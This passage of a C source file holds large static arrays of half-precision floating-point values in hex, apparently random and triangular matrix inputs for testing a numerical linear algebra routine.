0x3edf, 0x4015, 0x3c22, 0x3e5c, 0x3c5e, 0x3e70, 0x3d54, 0x3ca8, 0x3be5, 0x3d75, 0x3dc5, 0x3c99, 0x3f98, 0x3d21, 0x3f06, 0x3ca8, 0x3f4b, 0x3d4c, 0x3f17, 0x3e8f, 0x3bb9, 0x3e69, 0x3bfd, 0x3de8, 0x3be5, 0x3d4c, 0x3e89, 0x3e2d, 0x3de4, 0x3d12, 0x4030, 0x3d07, 0x3edf, 0x3d75, 0x3f17, 0x3e2d, 0x4044, 0x3f92, 0x3cf5, 0x402c, 0x3d8f, 0x4015, 0x3dc5, 0x3e8f, 0x3de4, 0x3f92, 0x4061, 0x41fa, 0x3e5c, 0x40a7, 0x3e25, 0x4098, 0x3de7, 0x409c, 0x40d2, 0x424f, 0x3f0f, 0x3d99, 0x3fb0, 0x40ac, 0x4122, 0x3e91, 0x3e5c, 0x3fab, 0x3e10, 0x3bc3, 0x3e99, 0x3d63, 0x3f1c, 0x4065, 0x4111, 0x3d50, 0x3c90, 0x3c4c, 0x3f45, 0x3dd0, 0x3a98, 0x40a7, 0x3e10, 0x419f, 0x3f74, 0x3ffd, 0x3ea9, 0x4024, 0x40ea, 0x4110, 0x3fbc, 0x3cb0, 0x401b, 0x401f, 0x3f29, 0x3efa, 0x3e25, 0x3bc3, 0x3f74, 0x3f33, 0x3d8e, 0x3ba8, 0x3d5b, 0x3f07, 0x3f20, 0x3d9b, 0x3c0e, 0x3e40, 0x3ebc, 0x3c3e, 0x3e16, 0x4098, 0x3e99, 0x3ffd, 0x3d8e, 0x417b, 0x3d0a, 0x3fb5, 0x4160, 0x4182, 0x3e17, 0x3d2b, 0x3fae, 0x3fa3, 0x405d, 0x3c93, 0x3de7, 0x3d63, 0x3ea9, 0x3ba8, 0x3d0a, 0x3ec2, 0x3d1b, 0x3fa1, 0x3fd5, 0x3cb9, 0x3a45, 0x3c7b, 0x3df1, 0x3e0c, 0x3b0b, 0x409c, 0x3f1c, 0x4024, 0x3d5b, 0x3fb5, 0x3d1b, 0x4132, 0x40b1, 0x41b2, 0x3ec1, 0x3e07, 0x3ef7, 0x4086, 0x3f22, 0x3d76, 0x40d2, 0x4065, 0x40ea, 0x3f07, 0x4160, 0x3fa1, 0x40b1, 0x4303, 0x427c, 0x401a, 0x3f0a, 0x4076, 0x40dc, 0x40b5, 0x3dc1, 0x424f, 0x4111, 0x4110, 0x3f20, 0x4182, 0x3fd5, 0x41b2, 0x427c, 0x4456, 0x4022, 0x3f66, 0x4028, 0x41d3, 0x41e1, 0x3fa5, 0x3f0f, 0x3d50, 0x3fbc, 0x3d9b, 0x3e17, 0x3cb9, 0x3ec1, 0x401a, 0x4022, 0x3f9e, 0x3d6e, 0x3e3a, 0x3f72, 0x3e5b, 0x3d48, 0x3d99, 0x3c90, 0x3cb0, 0x3c0e, 0x3d2b, 0x3a45, 0x3e07, 0x3f0a, 0x3f66, 0x3d6e, 0x3d5f, 0x3ce3, 0x3e58, 0x3d67, 0x3be9, 0x3fb0, 0x3c4c, 0x401b, 0x3e40, 0x3fae, 0x3c7b, 0x3ef7, 0x4076, 0x4028, 0x3e3a, 0x3ce3, 0x406d, 0x3eb4, 0x3ea4, 0x3d9a, 0x40ac, 0x3f45, 0x401f, 0x3ebc, 0x3fa3, 0x3df1, 0x4086, 0x40dc, 0x41d3, 0x3f72, 0x3e58, 0x3eb4, 0x4162, 0x3fa5, 0x3e1c, 0x4122, 0x3dd0, 0x3f29, 0x3c3e, 0x405d, 0x3e0c, 0x3f22, 0x40b5, 0x41e1, 0x3e5b, 0x3d67, 0x3ea4, 0x3fa5, 0x41ab, 0x3d15, 0x3e91, 0x3a98, 0x3efa, 0x3e16, 0x3c93, 0x3b0b, 0x3d76, 0x3dc1, 0x3fa5, 0x3d48, 0x3be9, 0x3d9a, 0x3e1c, 0x3d15, 0x3e8f, 0x2c00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3200, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3400, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3500, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3600, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3700, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3800, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3880, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3900, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3980, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x3a00, 0x3400, 0x3400, 0x3a00 }; static const uint16_t in_rnda_dpo[709] = { 0xbc00, 0x3722, 0x35e4, 0x3c00, 0xb510, 0x3821, 0xb576, 0x36f7, 0xb530, 0xadfd, 0x38c0, 0xb8e3, 0x3c00, 0xbb08, 0xb87b, 0xb4e9, 0xaeee, 0x362e, 0xb96a, 0x3848, 0x341d, 0xbc00, 0xa4ff, 0xb514, 0xb620, 0xb4ed, 0xb589, 0xb10a, 0x3567, 0xb8dc, 0x2895, 0xb5b3, 0xb1e6, 0x355a, 0xae91, 0x2f66, 0xb93d, 0xb443, 0x24ea, 0xa890, 0x2cf4, 0x385d, 0x3571, 0xa351, 0x261c, 0xb92e, 0x38eb, 0xae5f, 0x36c3, 0x330e, 0x34cd, 0xb81e, 0x3c00, 0xb865, 0xb683, 0xb159, 0x2baf, 0xb1b1, 0xb43f, 0xb910, 0xb647, 0xb571, 0xb7b2, 0x31a2, 0x347a, 0xb61b, 0xa20e, 0xad65, 0x2a46, 0x37c8, 0xb227, 0xab5b, 0xb1d9, 0xac20, 0xb713, 0xb1b2, 0xab06, 0x3027, 0xb4d1, 0xb23d, 0xbb96, 0x32be, 0x36c6, 0xb667, 0xb973, 0x3601, 0x3b35, 0x323f, 0xb2fc, 0xb8ec, 0x2f2c, 0x308f, 0xaea8, 0xae23, 0x38b2, 0x3b34, 0xaa9b, 0xb7f8, 0xb860, 0x345e, 0x3611, 0xb8b8, 0x3467, 0xb964, 0x2a6e, 0x3b80, 0x32e6, 0x2dbd, 0xb29e, 0x2d9b, 0x3976, 0xbaa1, 0x38a4, 0xaf90, 0x38be, 0x309a, 0xb813, 0x3897, 0xad9f, 0xa8e5, 0x3c00, 0xb02e, 0xb973, 0x37b8, 0x35de, 0x2557, 0xb97a, 0x31c4, 0xafd9, 0x330a, 0x2f9c, 0xb17d, 0xb3ea, 0x36d9, 0x357d, 0x2c2f, 0x3758, 0xb861, 0xb903, 0x380a, 0xb889, 0xb5cd, 0xb2da, 0xb406, 0x344b, 0x3696, 0x38e7, 0x364e, 0x341e, 0x347c, 0x30ed, 0x2d7c, 0x3a83, 0xb60d, 0xb231, 0xb079, 0x2558, 0xac14, 0x3b60, 0xb588, 0x34ce, 0xb287, 0x34d2, 0xb089, 0xb434, 0xb246, 0xb9df, 0xb848, 0xb20e, 0x321f, 0xba49, 0xb804, 0x3144, 0x3923, 0x3033, 0x2250, 0x37eb, 0x3afa, 0xa8b6, 0xa88c, 0x3708, 0x2c25, 0x3084, 0xb9c7, 0x2590, 0x356f, 0xb77c, 0xae7d, 0xbb19, 0x367a, 0xb839, 0x3275, 0x38d9, 0x36c0, 0xaf2e, 0xb025, 0xa03b, 0xb84b, 0xb2bc, 0x3b51, 0xa812, 0x2d6d, 0xb8c6, 0x2ed4, 0x3977, 0x3719, 0xb1d8, 0x35f7, 0xba55, 0xa924, 0xad99, 0xb3ab, 0x35ce, 0xb5b4, 0x381c, 0xb9cf, 0x38bb, 0xbb5f, 0x3520, 0x39cd, 0xb4f7, 0x35af, 0x3c00, 0x3539, 0x3664, 0x3808, 0xb4c7, 0x29a5, 0x3874, 0xbb42, 0xb2aa, 0xb28b, 0xa945, 0x2e1f, 0xb93b, 0x34dc, 0x1fed, 0x37de, 0xb0e9, 0xb59d, 0x38b9, 0xb395, 0xb70c, 0xbba7, 0xb8f2, 0x3447, 0x3845, 0x3bb7, 0xae1c, 0x314a, 0x293f, 0xabcf, 0x2e6e, 0xb0a4, 0x373b, 0xa89f, 0x33b9, 0x34b1, 0x2ded, 0x3662, 0x3a7b, 0xae64, 0x249e, 0x33dd, 0x2441, 0xb7d5, 0x2828, 0x3853, 0x2d6a, 0x3840, 0x3540, 0x3495, 0xb824, 0xb1f6, 0x2d84, 0xb13f, 0x27a8, 0x3a26, 0x39f5, 0xb144, 0xb0be, 0xaca1, 0x3692, 0x39a2, 0xb615, 0xaeb3, 0x3a65, 0x33ac, 0x2d3b, 0x2c5b, 0x98c7, 0xb165, 0xb586, 0xb250, 0xb528, 0x3153, 0x388e, 0x147a, 0x31ef, 0xac60, 0x2dad, 0xb139, 0xb5c4, 0x31bc, 0x3543, 0xb2ba, 0x387f, 0x3963, 0x3334, 0xa8f6, 0xac29, 0xb5ca, 0xb2c6, 0x33d9, 0x3572, 0xae3a, 0xb464, 0xab65, 0xb1a0, 0x3612, 0xac58, 0x33bb, 0x3566, 0x3690, 0xb0e2, 0x31b8, 0x311e, 0x34b0, 0x37e6, 0x335a, 0xb34c, 0xb52e, 0xb68f, 0xac3b, 0x3885, 0xb8b2, 0x2e06, 0xac75, 0xb4e3, 0xb321, 0xb56c, 0xb224, 0x35ee, 0x33cd, 0xaffa, 0x3473, 0x322d, 0x2602, 0xb96e, 0x340e, 0x325b, 0xb4ba, 0x2d49, 0xb902, 0xb5f6, 0xb0cb, 0x31f2, 0xba1c, 0xb41f, 0x2662, 0x3abf, 0xac6b, 0xb46a, 0x38d0, 0xb794, 0x2fa7, 0xb802, 0x32da, 0x2e79, 0xae1d, 0x3857, 0xb284, 0x34a5, 0x34dc, 0x3a34, 0x35c3, 0x3814, 0xb64b, 0xb5bb, 0x37b5, 0xb79f, 0xb369, 0xb722, 0xab16, 0xb68b, 0x2cee, 0xb453, 0xb4e5, 0x34fa, 0xb121, 0xb42c, 0xacb2, 0xb66f, 0xa89c, 0x187e, 0x292f, 0xb93f, 0xb4a2, 0xb48a, 0xb294, 0x38ee, 0x34d6, 0xaa0e, 0xaf52, 0xb4fd, 0xb450, 0xb28a, 0x3a10, 0xbaff, 0xb993, 0x3839, 0x251f, 0xb4f4, 0xa6f4, 0xb46b, 0x39ac, 0x37a1, 0x2c65, 0x397d, 0x31e1, 0x347a, 0x3411, 0xa56e, 0xb531, 0xb82a, 0xb503, 0xb0e7, 0xb861, 0xadcc, 0xb46f, 0x3c00, 0x30c0, 0xb3ed, 0x350d, 0xa7f7, 0x2686, 0xb3dd, 0x3487, 0xb897, 0x39cd, 0x2ded, 0x355b, 0x363f, 0x34cc, 0x26a1, 0xb666, 0x2c86, 0x38d9, 0xb35a, 0x32a1, 0x3009, 0xad58, 0x306c, 0x20ac, 0x2e7a, 0xa625, 0xb5c3, 0x30ac, 0xb753, 0xb591, 0xaf52, 0x2eae, 0x33fc, 0xad20, 0x3738, 0x3882, 0xbb22, 0x3837, 0xae4e, 0xb575, 0xb855, 0xb935, 0xb5ec, 0x37dd, 0xb769, 0xb2b7, 0x3581, 0x321d, 0x34e1, 0x37d9, 0xb6be, 0x28c4, 0x38bc, 0xb622, 0x379f, 0xb26c, 0x3132, 0x2f66, 0xa85d, 0xb0c2, 0x38d2, 0x33bd, 0x3551, 0x3527, 0x28e3, 0xb8a9, 0xb849, 0x308a, 0x2588, 0x2fc2, 0x3885, 0x3133, 0x379d, 0xb801, 0x3a71, 0x398c, 0xb2fa, 0x34ab, 0xac8b, 0xbbe8, 0xb735, 0xb7b4, 0x38b4, 0x3936, 0xb476, 0xb2eb, 0x33c1, 0x34bc, 0xb7b0, 0xafd3, 0x34cb, 0xb033, 0xb69b, 0xb862, 0x289f, 0xb50d, 0x35b4, 0xb919, 0xb54e, 0xb084, 0x343d, 0xb4e5, 0xb999, 0x34de, 0xb97b, 0x347e, 0xb73a, 0xbbd1, 0x2d5c, 0xb0dc, 0x384f, 0x38d4, 0x3725, 0x366c, 0x36b1, 0x30ac, 0x2e45, 0xb526, 0xb5f8, 0x2a6e, 0xb8ff, 0xb4a6, 0xb9a3, 0xb5a9, 0xb0d6, 0x2128, 0xb00b, 0x354e, 0xb35e, 0xb268, 0x38dc, 0x381f, 0xb4a9, 0xb2e6, 0x332b, 0x338a, 0x3a88, 0x2a04, 0xb412, 0xb51c, 0xbbe0, 0x37e0, 0xb1b1, 0xb4df, 0x3947, 0x34ed, 0x3507, 0x30c9, 0x36d1, 0x362c, 0x327b, 0xad4f, 0xb6fe, 0x31ee, 0xb850, 0xb8ae, 0xb5cd, 0xade5, 0x3487, 0x3042, 0x2c64, 0xa288, 0x36ed, 0xb7e7, 0xa185, 0xb78d, 0x3521, 0xb68f, 0x339b, 0x3a26, 0xba4d, 0x35a5, 0xb7de, 0xb803, 0xb53f, 0x3a21, 0xb3b0, 0x3231, 0xaea0, 0xb573, 0x3307, 0xb86b, 0xaa3a, 0x32e2, 0xac17, 0x369c, 0xaf7b, 0x32e1, 0x3141, 0x2d6a, 0x9f71, 0x311c, 0xb799, 0x354f, 0xa7bb, 0xabcc, 0x2812, 0xa5c9, 0xb085, 0xb66e, 0xad41, 0x28a3, 0x36d6, 0xa644, 0xa9b4, 0xba3e, 0xa9b1, 0x342b, 0x3804, 0x32b6, 0x3778, 0x386b, 0xa785, 0x358a, 0x379a, 0x3961, 0x39dd, 0x315e, 0xb840, 0x2fdc, 0xb502, 0x36ed, 0xb6b4, 0x32ca, 0x328d, 0xae15, 0xb395, 0xb017, 0xb197, 0xbc00, 0xaddb, 0xb602, 0xb384, 0x16ab, 0xb9fe, 0x3875, 0x3139, 0x3701, 0x340a, 0x3908, 0xb898, 0xa205, 0xab8d, 0x3775, 0xaf97, 0xb1e7, 0x369f, 0x9a76, 0xb305, 0x9a19, 0xa662, 0x342b, 0x3890, 0x31b4, 0xb313, 0xb160, 0x39ba, 0x2e7b, 0x33b8, 0xaadd, 0x3594, 0xb6c6, 0x3884, 0x2dad, 0xb527, 0xb8ee, 0x2fcd, 0x3456, 0xb367, 0x34b2, 0xb543, 0xb914, 0xb18c, 0x3437, 0xba47, 0xbc00, 0xb849, 0xb150, 0x3b36 }; static const uint16_t in_uptriangular_dpo[709] = { 0x3800, 0x3aee, 0x349e, 0x0, 0x3a88, 0x39dc, 0xb41c, 0x34c9, 0x0, 0x39eb, 0x2bf0, 0x0, 0x0, 0x3af6, 0x3b28, 0x39d2, 0x3863, 0x39b2, 0x0, 0x3242, 0x2cd6, 0xad02, 0x0, 0x0, 0x357a, 0xb662, 0x0, 0x0, 0x0, 0x32f9, 0x3ce2, 0x3cfb, 0x3d68, 0x390d, 0x3b8d, 0x3aa4, 0x37af, 0x0, 0x3b3e, 0x3822, 0x3665, 0x2e17, 0x39d3, 0x38b8, 0x0, 0x0, 0x3696, 0xb3c3, 0x3715, 0x282a, 0xb058, 0x0, 0x0, 0x0, 0x3785, 0x24c0, 0x2879, 0x30ad, 0x0, 0x0, 0x0, 0x0, 0x3800, 0xb5ef, 0xb055, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30f3, 0xb0b5, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2e5c, 0x3ce8, 0x3c09, 0x3d7c, 0x38e5, 0x3b04, 0x3892, 0x3b1b, 0x3af2, 0x0, 0x394a, 0x3a06, 0x3805, 0x349c, 0x390a, 0x382e, 0xb16d, 0x0, 0x0, 0x34fd, 0xa946, 0x2c95, 0xb543, 0x33fe, 0xad95, 0x0, 0x0, 0x0, 0x34c8, 0x2d18, 0xb0bb, 0x2af6, 0x3214, 0x0, 0x0, 0x0, 0x0, 0x38c4, 0x36d6, 0xad5b, 0x28ec, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3127, 0xa7dd, 0x3275, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x367b, 0x1c4c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x35e5, 0x3bec, 0x3d5c, 0x3b6f, 0x3d3e, 0x3c2d, 0x3ca5, 0x3bcd, 0x3d1f, 0x3d01, 0x0, 0x3a14, 0x3721, 0x382e, 0x3407, 0x373b, 0x363b, 0x37f2, 0x384f, 0x0, 0x0, 0x3757, 0x300b, 0x2581, 0x1c3c, 0xb1ab, 0xb563, 0xa789, 0x0, 0x0, 0x0, 0x3950, 0x312a, 0x9b0c, 0x26a9, 0xb446, 0x31e7, 0x0, 0x0, 0x0, 0x0, 0x363e, 0xb699, 0xb54c, 0xafc6, 0xacb6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3519, 0xb5fd, 0x28af, 0xb455, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x37fc, 0x29d0, 0xb1fb, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x329b, 0x3581, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x341a, 0x3eea, 0x3b5c, 0x3d62, 0x3b1c, 0x3d50, 0x3ad5, 0x3d56, 0x3d94, 0x3f4d, 0x3c15, 0x3a7a, 0x3c72, 0x3d67, 0x3df0, 0x3b99, 0x0, 0x3c24, 0x344b, 0x30ba, 0x369c, 0x3856, 0x3841, 0x3b13, 0x3a9a, 0x3604, 0x3621, 0x2a70, 0x3872, 0x2d63, 0xaa15, 0x0, 0x0, 0x3bb4, 0x3938, 0x2e8e, 0x3629, 0x3066, 0x35b8, 0xb0d7, 0x37a1, 0xa54f, 0x3882, 0x2e37, 0xb3ac, 0x37f5, 0x0, 0x0, 0x0, 0x3a00, 0x2edb, 0xb1ad, 0xa507, 0x3292, 0x31cb, 0x3170, 0x3559, 0x3442, 0x3730, 0xb0ee, 0x37ae, 0x0, 0x0, 0x0, 0x0, 0x3b14, 0xb048, 0xad8b, 0x376d, 0xa43d, 0xac07, 0x2729, 0x3614, 0xb246, 0x33c7, 0xb344, 0x0, 0x0, 0x0, 0x0, 0x0, 0x397a, 0xb51b, 0x34a4, 0x2b92, 0xad49, 0xac21, 0x28a5, 0x2c69, 0x36eb, 0xabc2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x391c, 0x3137, 0x267b, 0x2a90, 0x3561, 0x351a, 0x3421, 0xad4c, 0x2949, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3842, 0xab1d, 0x3410, 0x3578, 0x3440, 0xad46, 0x320a, 0x9f22, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3817, 0xae21, 0x2391, 0x2f12, 0xb203, 0x347c, 0x3662, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38ea, 0x3616, 0x2c65, 0x32f3, 0x35a1, 0x2f25, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x330e, 0xa8fc, 0x2283, 0x2968, 0x3072, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3800, 0xa532, 0xa06e, 0xabd1, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3626, 0xaa51, 0x1e76, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x32ca, 0xac2f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x297c, 0x3400, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x35a8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x36ee, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3800, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3879, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38e6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x394b, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x39a8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a53, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3aa2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3aee, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b36, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3bbf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c00, 0x3aee, 0x349e, 0x0, 0x3a88 }; static const uint16_t in_lotriangular_dpo[709] = { 0x3800, 0x3aee, 0x0, 0x349e, 0x3a88, 0x39dc, 0x0, 0x0, 0xb41c, 0x39eb, 0x0, 0x34c9, 0x2bf0, 0x3af6, 0x3b28, 0x0, 0x0, 0x0, 0x39d2, 0x3242, 0x0, 0x0, 0x3863, 0x2cd6, 0x357a, 0x0, 0x39b2, 0xad02, 0xb662, 0x32f9, 0x3ce2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3cfb, 0x3b3e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d68, 0x3822, 0x3696, 0x0, 0x0, 0x0, 0x0, 0x390d, 0x3665, 0xb3c3, 0x3785, 0x0, 0x0, 0x0, 0x3b8d, 0x2e17, 0x3715, 0x24c0, 0x3800, 0x0, 0x0, 0x3aa4, 0x39d3, 0x282a, 0x2879, 0xb5ef, 0x30f3, 0x0, 0x37af, 0x38b8, 0xb058, 0x30ad, 0xb055, 0xb0b5, 0x2e5c, 0x3ce8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c09, 0x394a, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d7c, 0x3a06, 0x34fd, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38e5, 0x3805, 0xa946, 0x34c8, 0x0, 0x0, 0x0, 0x0, 0x3b04, 0x349c, 0x2c95, 0x2d18, 0x38c4, 0x0, 0x0, 0x0, 0x3892, 0x390a, 0xb543, 0xb0bb, 0x36d6, 0x3127, 0x0, 0x0, 0x3b1b, 0x382e, 0x33fe, 0x2af6, 0xad5b, 0xa7dd, 0x367b, 0x0, 0x3af2, 0xb16d, 0xad95, 0x3214, 0x28ec, 0x3275, 0x1c4c, 0x35e5, 0x3bec, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d5c, 0x3a14, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b6f, 0x3721, 0x3757, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d3e, 0x382e, 0x300b, 0x3950, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c2d, 0x3407, 0x2581, 0x312a, 0x363e, 0x0, 0x0, 0x0, 0x0, 0x3ca5, 0x373b, 0x1c3c, 0x9b0c, 0xb699, 0x3519, 0x0, 0x0, 0x0, 0x3bcd, 0x363b, 0xb1ab, 0x26a9, 0xb54c, 0xb5fd, 0x37fc, 0x0, 0x0, 0x3d1f, 0x37f2, 0xb563, 0xb446, 0xafc6, 0x28af, 0x29d0, 0x329b, 0x0, 0x3d01, 0x384f, 0xa789, 0x31e7, 0xacb6, 0xb455, 0xb1fb, 0x3581, 0x341a, 0x3eea, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b5c, 0x3c24, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d62, 0x344b, 0x3bb4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3b1c, 0x30ba, 0x3938, 0x3a00, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d50, 0x369c, 0x2e8e, 0x2edb, 0x3b14, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3ad5, 0x3856, 0x3629, 0xb1ad, 0xb048, 0x397a, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d56, 0x3841, 0x3066, 0xa507, 0xad8b, 0xb51b, 0x391c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3d94, 0x3b13, 0x35b8, 0x3292, 0x376d, 0x34a4, 0x3137, 0x3842, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f4d, 0x3a9a, 0xb0d7, 0x31cb, 0xa43d, 0x2b92, 0x267b, 0xab1d, 0x3817, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c15, 0x3604, 0x37a1, 0x3170, 0xac07, 0xad49, 0x2a90, 0x3410, 0xae21, 0x38ea, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3a7a, 0x3621, 0xa54f, 0x3559, 0x2729, 0xac21, 0x3561, 0x3578, 0x2391, 0x3616, 0x330e, 0x0, 0x0, 0x0, 0x0, 0x3c72, 0x2a70, 0x3882, 0x3442, 0x3614, 0x28a5, 0x351a, 0x3440, 0x2f12, 0x2c65, 0xa8fc, 0x3800, 0x0, 0x0, 0x0, 0x3d67, 0x3872, 0x2e37, 0x3730, 0xb246, 0x2c69, 0x3421, 0xad46, 0xb203, 0x32f3, 0x2283, 0xa532, 0x3626, 0x0, 0x0, 0x3df0, 0x2d63, 0xb3ac, 0xb0ee, 0x33c7, 0x36eb, 0xad4c, 0x320a, 0x347c, 0x35a1, 0x2968, 0xa06e, 0xaa51, 0x32ca, 0x0, 0x3b99, 0xaa15, 0x37f5, 0x37ae, 0xb344, 0xabc2, 0x2949, 0x9f22, 0x3662, 0x2f25, 0x3072, 0xabd1, 0x1e76, 0xac2f, 0x297c, 0x3400, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x35a8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 